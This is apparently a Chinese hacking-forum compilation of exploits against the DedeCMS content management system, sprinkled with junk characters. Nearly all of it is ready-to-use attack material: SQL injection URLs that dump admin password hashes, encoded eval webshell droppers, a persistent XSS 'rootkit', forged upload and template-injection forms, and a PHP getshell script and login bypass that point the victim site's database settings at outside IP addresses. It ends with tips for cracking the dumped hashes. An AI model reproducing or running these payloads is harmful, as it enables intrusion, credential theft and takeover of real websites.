Dedecms 5.6 rss注入漏洞
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 嵌入恶意代码执行漏洞
8 N+ L* I4 R0 ], u$ Y注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}! T$ Q3 l$ M# n) \3 T @' v5 d
发表后查看或修改即可执行
+ i0 o) H* O& E8 G7 R: ga{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}% |+ a; A7 ~; U) z% X
生成x.php 密码xiao,直接生成一句话。- m3 ^* l! e+ B9 y
Dede 5.6 GBK SQL注入漏洞
1 O& @: k/ p# u+ phttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
2 {$ @" V& A, E5 d6 J1 Ihttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe" P: D3 f% O; n! j! H
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7, B: s1 D+ z) q4 }% Y. ]& \
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
, r4 s0 Z: q$ s+ L$ @: ohttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` $ o$ J6 l# H" w; Y7 Q( H7 F) F
DEDECMS 全版本 gotopage变量XSS漏洞
' O( Z( B. F9 N I+ k, g( y* `1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
% f+ }: U& }- O- }9 k' f! J+ Nhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
8 v+ A( T. {6 Y0 m: Q0 _2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
3 [8 ^3 y# h5 hhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda9 K. l7 Y4 z% ~$ ?* C0 m
6 S4 X5 }0 D# l* e3 N1 Rhttp://v57.demo.dedecms.com/dede/login.php ~8 ]. n9 s; o
DeDeCMS(织梦)变量覆盖getshell
\/ q8 ^% g; ~) ~) A+ f#!usr/bin/php -w3 _% J: Y/ F4 Z$ j# s( _+ v. q
<?php
0 [* ^7 n: J; V+ @: _: @2 A$ j4 E+ Zerror_reporting(E_ERROR);3 R7 z$ X0 i. k1 M
set_time_limit(0);* x" K" P0 N) [; n; |. a, L5 p
print_r('+ M9 ]6 Q5 T+ u6 z" f* W. f2 j! F
DEDEcms Variable Coverage
! }/ x8 m) B/ \) qExploit Author: www.heixiaozi.comwww.webvul.com
0 ?+ h6 t) x% O& n Z9 R; `);5 K7 M3 t* x6 w" C+ `% f* V0 C ~
echo "\r\n";1 a1 F! p& k4 T
if($argv[2]==null){
1 K- v4 y* D# i; ~' R' @print_r('8 w4 {( `! ^; @0 d, l# H( Z
+---------------------------------------------------------------------------+6 V" I/ [) B B& ]# f3 L
Usage: php '.$argv[0].' url aid path
- u; S0 B3 D7 J& g5 g8 N$ eaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/8 z, E4 N& q/ n+ @. p. U) `( c6 T
Example:
* F( ?& t0 l$ m+ K+ ~0 ], zphp '.$argv[0].' www.site.com 1 old
5 u. W& _0 J) |+ O/ b+---------------------------------------------------------------------------+
! m, F, ]" |! x2 m5 U: _' o, h# |');( W; p: i4 I0 i! H6 I* F2 w+ c
exit;
% s9 v* t J& Z6 X" A! {# V- u! r# Y2 B}
/ y% L/ Y: k0 n o4 F& s$url=$argv[1];& X& e& F' |! w' u' q
$aid=$argv[2];! t3 y) K! M, p8 C; Y
$path=$argv[3];
9 T# z; }, j* n2 o: O9 G; Z& K, J X$exp=Getshell($url,$aid,$path);
! n4 l0 [! R- _6 ]+ \& `if (strpos($exp,"OK")>12){
c$ }' A4 ^* i. T8 Recho "$ E5 s8 A$ O7 i$ h% L
Exploit Success \n";3 }: a" s t) Z/ v, I5 y7 @
if($aid==1)echo "
9 ?5 W: n6 [9 BShell:".$url."/$path/data/cache/fuck.php\n" ;
. N1 ?" g, s8 Z9 c- G- T3 y
: {2 r: ^8 @5 _7 \' b6 D9 K2 e5 t& \
if($aid==2)echo "
3 E+ [7 V' p3 s/ {( r9 QShell:".$url."/$path/fuck.php\n" ;
1 L+ l7 l, f( ?
) V2 G# k5 l3 }( Z5 h+ z$ J" W. T; M. b, j& l `
if($aid==3)echo ". u$ n7 q- h; L# ?3 Y
Shell:".$url."/$path/plus/fuck.php\n";. T* T7 j0 p1 _8 j$ u: x
. ^# p9 z* X# b* o+ S
0 d6 B5 B8 W( i/ v2 J}else{& g2 [, H! r K! e" D" C6 ~
echo "
. N- V" V8 V% f6 cExploit Failed \n";. C1 C I; Q# [4 l9 D$ a
}
/ G0 u9 h) U8 |( e$ }5 yfunction Getshell($url,$aid,$path){
+ T) Z8 s3 Q) Z# A1 o- B+ {) Q! n$id=$aid;
, {- R8 k# a; ]0 n' z0 w7 ~' Q$host=$url;3 W+ N- c+ V6 ?
$port="80";' s) P) O5 S6 X1 ?
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
2 d% q8 E- w' @3 L! W; C R$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
n. Z& p/ a' y: O: K( `$data .= "Host: ".$host."\r\n";0 m+ g) o# [; h$ F
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";, v2 Z5 J& P! I+ Q
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; R; u% Z* X: F
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
3 g+ z: k, M1 h! Z$ M//$data .= "Accept-Encoding: gzip,deflate\r\n";* A) }9 N# \& ^1 O+ H5 s2 }
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
- a- \ D: F, n- L2 u% q$ ?, V, j$data .= "Connection: keep-alive\r\n";
\2 {% U/ m/ p/ S% X9 P' t3 Y# p$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ j2 M t/ W* v- @& v$data .= "Content-Length: ".strlen($content)."\r\n\r\n";' V* @% a v7 w" F) ^
$data .= $content."\r\n";
3 [- X; t5 n+ x# p, M) H$ock=fsockopen($host,$port);
2 Y' U) L! c2 P7 vif (!$ock) {% o) K- F- h) N1 q6 a$ f0 E
echo "5 u6 \& Q" @, V+ S* f
No response from ".$host."\n";/ \. n* e! s. b* @
}
, J* S6 O; m4 c3 z" |fwrite($ock,$data);
- i' W3 X, l7 z( l, Q) N5 ywhile (!feof($ock)) {# C3 O0 D5 `' K- g" n3 r
$exp=fgets($ock, 1024);
; L, X, l8 Y. g% H/ P- i0 s! Oreturn $exp;
# u) n4 M- c! P% N. A$ [}
3 w5 N- }7 ?6 \" T, s}
# C2 a" h/ k* q7 @* X1 w5 S7 ~- O( [" i0 H
4 F G& f* ?9 M h! n9 m5 [
?>: k) l- |9 | ^/ t$ A- e; T
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面validate=dcug改为当前的验证码,即可直接进入网站后台 O8 U# w, t s9 {& K* k
此漏洞的前提是必须得到后台路径才能实现
Dedecms织梦 标签远程文件写入漏洞
* z0 q( ?' N) S( ~% e0 f" G前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
$ Z/ v& o" b8 j<form action="" method="post" name="QuickSearch" id="QuickSearch">, h% G2 S* a- z% V5 a
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />; ?4 W2 r. D" I% U$ C$ l' b
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />$ ?4 \: }, N5 D8 Z7 t- w
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />8 D, c5 u f! W* Z7 @
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
' c" I" E2 Q. u* U( X4 O<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />: K8 W# r; Z9 n8 o4 L
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; B" {" c1 _- i I<input type="text" value="true" name="nocache" style="width:400">
; N3 E- B+ o& u& P1 D. a; C- r<input type="submit" value="提交" name="QuickSearchBtn"><br />/ v- y: K$ c4 B, F
</form>8 n+ e& v) q/ G7 _, N
<script>
, T% C% G4 N/ z* A. S( kfunction addaction()* m9 ]5 h# b& k f
{
3 [0 V$ u8 ^- J4 A! adocument.QuickSearch.action=document.QuickSearch.doaction.value;
4 y |& t# i* S7 S2 g. |- Z: a/ v}
9 J1 F( Q8 i0 H( \" B! f4 Q</script>
DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行9 b4 C0 ^1 b' a7 m! S3 I
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}( K' a& w# I$ _# ?, Y
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得) ?: t! x# ?+ i: G
Dedecms <= V5.6 Final模板执行漏洞
. I" ~% F ~+ w! X. w注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
! v% t' h' p; Z' A4 m2 N) E' Euploads/userup/2/12OMX04-15A.jpg
6 k2 K9 b. x' \& E. | A+ ~+ Y$ b7 ]6 s, G+ Y( U- R2 b
$ V& w N b4 x模板内容是(如果限制图片格式,加gif89a):
8 L- V9 h9 M* m% S) w |7 [{dede:name runphp='yes'}3 q0 f( k- k( D' a* s% _; s' R
$fp = @fopen("1.php", 'a');
- E$ l- N' j6 n@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
0 ~8 s/ _# F- [) @! K@fclose($fp);2 q& z7 U8 o: c# |' P
{/dede:name}: G* _1 U' V$ r4 ~: |8 n
2 修改刚刚发表的文章,查看源文件,构造一个表单:
) P Q: e1 Z# D. f7 ]<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
, D8 s7 w9 i) c. [4 C$ G<input type="hidden" name="dopost" value="save" />5 B( p" @' o! p3 f: S) ^
<input type="hidden" name="aid" value="2" />, |; e5 a7 A6 W: v/ [) p
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />' ~6 n1 |0 V2 ~9 D6 L( x' ?% j* l
<input type="hidden" name="channelid" value="1" />
2 c6 d: d s* r/ A' K1 ]6 x<input type="hidden" name="oldlitpic" value="" />3 j* }; ~$ g- N
<input type="hidden" name="sortrank" value="1275972263" />6 \: U+ {( H3 j# O' D0 W2 {
6 `% E/ ]3 A, b
: h4 n; o% I5 W* x v5 ], w5 i0 J<div id="mainCp">
+ B! W0 U# u5 c<h3 class="meTitle"><strong>修改文章</strong></h3>0 }8 B. y$ ^8 @
9 q) J" z8 T% a9 |# C0 A' ?
" i& a3 l' E) u5 |<div class="postForm">4 E: H/ r% I' V& Z x+ `
<label>标题:</label>2 L1 s4 k1 |" n4 w
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
/ I8 b* J; F3 B4 {2 o( F
) ~7 S* B: k' t. O4 R+ V
]* g6 M/ K+ I6 ^! L& C9 L<label>标签TAG:</label>
2 d' P* o: _: X: C2 \1 k9 C7 s Q<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)0 h( a P g1 B2 L, T+ c) r; N
+ c+ s+ d G) P2 {9 C7 ]9 s9 |' Q& k
0 k: n w8 \7 ]" B6 Y9 Q$ d' R4 `
<label>作者:</label>/ V# ?$ c' G# L7 \
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>& X5 V$ p: n# c, k$ w- |6 V
+ M% s: @2 ?* k- s" C7 G
6 Q+ n: ^5 F6 B9 \3 N<label>隶属栏目:</label>% F. E: H3 n; w
<select name='typeid' size='1'>, B# C7 V3 u/ a- R
<option value='1' class='option3' selected=''>测试栏目</option>
! J) U1 B' R9 Y2 u1 B3 S9 l. L# j</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
6 `" j7 x% ?# s- \" b9 C
, ]( B$ r+ S% s g1 ^, h. {' ?) F1 U5 t, o! k3 P
<label>我的分类:</label>
/ s$ j' D4 H5 ]! m9 h<select name='mtypesid' size='1'>
) y+ i8 ?4 d. A<option value='0' selected>请选择分类...</option>
: K6 L% N9 y9 l6 {<option value='1' class='option3' selected>hahahha</option>( ]! k4 @+ k; b5 c4 ~
</select>
5 M3 v/ W7 X. a8 j9 x
8 f; R- ~ m: F' P x
3 _+ p# m0 g+ W* r' \<label>信息摘要:</label>. x3 z! S8 `% q$ k- u3 [
<textarea name="description" id="description">1111111</textarea>
+ V+ v( Z" ^; x6 e2 i' s2 a1 b1 b; D(内容的简要说明)
1 T, S: Z+ z$ Y- G9 \: `# ]9 v- Q6 a0 V4 }3 S6 I
9 Z1 E" ~/ \; v2 F3 Y8 f" X<label>缩略图:</label>
! }$ B* C- Z: R# e% n0 @% f<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>. |) f/ \4 X; L
) V2 l( d" U6 o4 L# P8 P! Z% z5 G% Q( v6 ~! g" l
<input type='text' name='templet'$ d( U! k7 A" `: w+ F, A! o3 ~
value="../ uploads/userup/2/12OMX04-15A.jpg">- ^4 J8 Y+ ~0 L+ D- l' l9 F; T3 `
<input type='text' name='dede_addonfields'* J' [! F! R7 K
value="templet,htmltext;">(这里构造)2 f9 R2 d: R6 ~- `( E
</div>
5 M' r* C% N# x* |4 A# \" h1 Q# [' G J* x
- w7 u8 J0 x" u1 J. }<!-- 表单操作区域 -->0 y1 ]9 F$ L' a- P
<h3 class="meTitle">详细内容</h3>
5 X, F0 n' |% X2 J# A' |! Y- \; n7 [4 O) H
) d- c) M) g, |1 ^<div class="contentShow postForm">6 F+ M. C. U% P9 S5 D n) h( h% U
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>; a6 _8 D0 r9 }5 L7 R- c$ I( C; q% U8 E
, L0 O( y+ T } d9 x+ h5 _
! {4 j9 w. a# `% X n
<label>验证码:</label>
& J% [# S9 u1 f* e$ _4 b<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />1 v. ~+ P/ s% q% t3 a, G% t
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
) L2 w& J9 ^2 \4 M& _
3 U" e7 m( n% Y! [* Y# Y8 X: L& R7 R8 k1 n8 n. U, V+ F9 |& G
<button class="button2" type="submit">提交</button>
\( j6 l" }+ C2 r<button class="button2 ml10" type="reset">重置</button>
3 D+ J+ D% w; J$ R</div>' P p% ^$ g( o& n Q+ Q8 a" D
; e$ d& {, h% J* U6 L5 N% ?5 |
# ]& P) E( b$ t6 g5 T, F" Z" P</div>, P4 |! p4 f+ a& p$ L2 \( m$ g
' D8 g$ h) h6 J7 y! e' D c* c2 ~# c
</form>
/ c2 k t+ a" w7 h' V8 y' b: M# T- {: Z: y7 A; K' F2 o7 p
, ?: M3 L6 r K2 C8 H& S( |; `提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:$ V0 ` z! ^. ^) C2 T% k
假设刚刚修改的文章的aid为2,则我们只需要访问:
/ @. B, H7 Y" chttp://127.0.0.1/dede/plus/view.php?aid=2
3 k! b" ~; b) O; n* M* X, h" R- g即可以在plus目录下生成webshell:1.php
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
; y# T# c# m. B$ a, {phpinfo();
' J1 R7 J" m! s! D{/dede:field}/ g7 d( H/ T' g+ n$ z9 I( C; ]
保存为1.gif
; U" T) s' w5 Q o; J<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> * u2 y( L0 d+ C; }- t
<input type="hidden" name="aid" value="7" />
) A+ v1 A* V4 t ?<input type="hidden" name="mediatype" value="1" /> " T1 J4 S4 L1 A _' F
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 4 Z6 q& M4 w6 R5 ]
<input type="hidden" name="dopost" value="save" />
9 Z" n9 ^0 X- }5 R, T" O6 {" J<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ( L& _! g9 D% I6 R% c; }# t! \
<input name="addonfile" type="file" id="addonfile"/> 7 v0 A6 i/ N3 l/ i" J
<button class="button2" type="submit" >更改</button>
" ^$ |: q% Q* U</form> - H; A/ e& R4 P g& C4 o
1 M( R) o3 `: ^ I8 k
$ g- S/ z [, q! E9 O
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif6 _1 u) O! y7 [1 i- i
发表文章,然后构造修改表单如下:
+ f& ?, Y) W# N) P% K1 a) H+ \) @* ]; _
8 u7 k# o* J* i<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
" n* I4 h0 ?& _+ O& c; J: i0 c<input type="hidden" name="dopost" value="save" /> , m$ X* y, ?: r) a; B
<input type="hidden" name="aid" value="2" /> / g& [8 g! ]- j8 k5 t w3 i% E
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> # {% J& ^! _# F+ Z' c
<input type="hidden" name="channelid" value="1" /> ' V, Q& p v3 }. ?# b. d' z
<input type="hidden" name="oldlitpic" value="" />
3 F+ i* q8 e' C, Z8 r<input type="hidden" name="sortrank" value="1282049150" /> - n2 K4 o! s( X# m
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ' D% |" u0 r! x/ m/ R& M0 j. a4 D& K
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> / f$ i2 |* }# ]( a9 e/ h
<select name='typeid' size='1'> ( A$ S; u: [1 g* e3 ~2 O( O V
<option value='1' class='option3' selected=''>Test</option> 1 y. `# @6 D0 s; J- m
<select name='mtypesid' size='1'>
4 I: W( ?6 r' D1 U4 B- |, P<option value='0' selected>请选择分类...</option>
- c, p5 h1 i8 ]. E6 v<option value='1' class='option3' selected>aa</option></select> 5 V) M" m( W2 t. v7 ?
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> & m! j! D% A0 q: b
<input type='hidden' name='dede_addonfields' value="templet"> # \6 v2 C! n# D* n; d
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> R: |/ K( b% c* H4 {2 t. Z+ O
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
! O. h/ K1 L9 i4 ^: ?' I; h2 k' ^<button class="button2" type="submit">提交</button> + I3 k1 `& M2 C/ y5 N
</form>
织梦(Dedecms)V5.6 远程文件删除漏洞
0 d# g7 Y, ]6 H* @2 C6 Y0 Y' ohttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
http://www.test.com/plus/carbuya ... urn&code=../../7 B# k- R7 ]% x ^$ R2 E0 f
DedeCms V5.6 plus/advancedsearch.php 任意SQL语句执行漏洞
* d2 C- |/ T9 ]5 S* `plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
, ]9 Q. `1 r, w f* ~密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD53 ?' g: ^' B* V- f# a
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='; \6 v8 T: K5 T; N$ a1 Q$ u0 O
织梦(Dedecms)select_soft_post.php页面变量未初始化漏洞
<html> d% u" P5 l. W( {8 f9 }* S/ E
<head>6 e0 ?2 [6 e. S7 v6 P2 m6 Q
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>1 b3 P6 }# y! R" y' r
</head>
6 G' {. i5 T3 M: @" W<body style="FONT-SIZE: 9pt">
% r3 M5 S c* D( W: ?---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />. N- y% V3 A0 a: E/ G7 c( [
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
?) X+ F: U1 A1 T' f K<input type='hidden' name='activepath' value='/data/cache/' />
' D4 O. y9 R+ D- e<input type='hidden' name='cfg_basedir' value='../../' />) w% t& ?8 E9 c; z: t3 C
<input type='hidden' name='cfg_imgtype' value='php' />. ^% i& _& D4 w7 M0 N2 M9 m
<input type='hidden' name='cfg_not_allowall' value='txt' />
4 y/ }* [5 e; E E<input type='hidden' name='cfg_softtype' value='php' />& c. }. C( Q! d8 x3 z5 W
<input type='hidden' name='cfg_mediatype' value='php' />
E, ]& Q9 @, u8 c8 u7 }9 ~' R<input type='hidden' name='f' value='form1.enclosure' />
! K$ D9 O* B0 w; G7 F+ w<input type='hidden' name='job' value='upload' />% A! |5 z X3 y4 d2 Y2 H8 d* x
<input type='hidden' name='newname' value='fly.php' />% _' ^% l: O+ b; q/ R- s; [
Select U Shell <input type='file' name='uploadfile' size='25' />" Z+ v3 p+ p3 p2 ^; N4 x
<input type='submit' name='sb1' value='确定' />( E+ ~8 S& \/ U2 N& L
</form>( j$ S8 Q& j$ u: L
<br />It's just a exp for the bug of Dedecms V55...<br />* y4 s& W' n& `5 d0 ]) }
Need register_globals = on...<br />/ {. v9 u3 H4 \& P' V. k0 X) }
Fun the game,get a webshell at /data/cache/fly.php...<br />
+ v+ o0 E' f0 Z+ y4 F+ n* F' D% l5 u</body>' E4 e8 w3 y/ K; i; K& d f$ l
</html>* W& D/ m3 q/ R P( l1 X
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
该漏洞由两点共同造成:MySQL字段数值溢出会引发错误;DEDECMS把数据库错误信息记录到一个PHP文件中,而该文件头部没有任何验证。
1 O. o% g0 U2 H. t7 m/ V7 t4 G1. 访问网址:( k0 q' u6 b" O
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
% ]) N( {$ e4 \' @3 P5 |可看见错误信息! Q" J+ s' W/ h$ A! N# G
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
: S' b) [* w: n, A4 qint(3) Error: Illegal double '1024e1024' value found during parsing, n& r" d' Y$ R5 m4 D* d; i1 e
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>& Y1 A2 @7 A/ J- H4 Z( ?" ?, B$ ]
: O* N" ?( [5 Q5 M& q' i# U# I
6 Y! d0 Y9 Q# S9 D7 b3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
" ?. }( |8 T* L5 c& O G/ G: h; a M, v* _
& o: t9 `! r+ F<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>6 n9 G3 k! D! v( O
$ r" M. U( f X5 m! G7 i! R: j0 n. V5 R7 \
按确定后的看到第2步骤的信息表示文件木马上传成功.
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |